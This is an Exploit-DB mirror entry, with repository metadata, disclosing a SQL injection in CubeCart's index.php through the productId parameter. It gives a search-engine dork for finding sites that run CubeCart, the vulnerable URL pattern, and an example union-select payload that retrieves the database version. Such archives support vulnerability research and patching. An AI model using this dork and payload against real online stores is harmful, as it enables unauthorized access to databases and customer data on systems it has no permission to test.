exploit-db-mirror/exploits/php/webapps/11495.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

21 lines
No EOL
769 B
Text

CubeCart (index.php) Sql Injection Vulnerability
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : http://www.cubecart.com/downloads/
.:. Dork : "powered by CubeCart" inurl:"index.php?_a="
####################################################################
===[ Exploit ]===
www.site.com/index.php?_a=viewProd&productId=22[Sql Sql Injection]
===[ Example ]===
http://server/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version()
####################################################################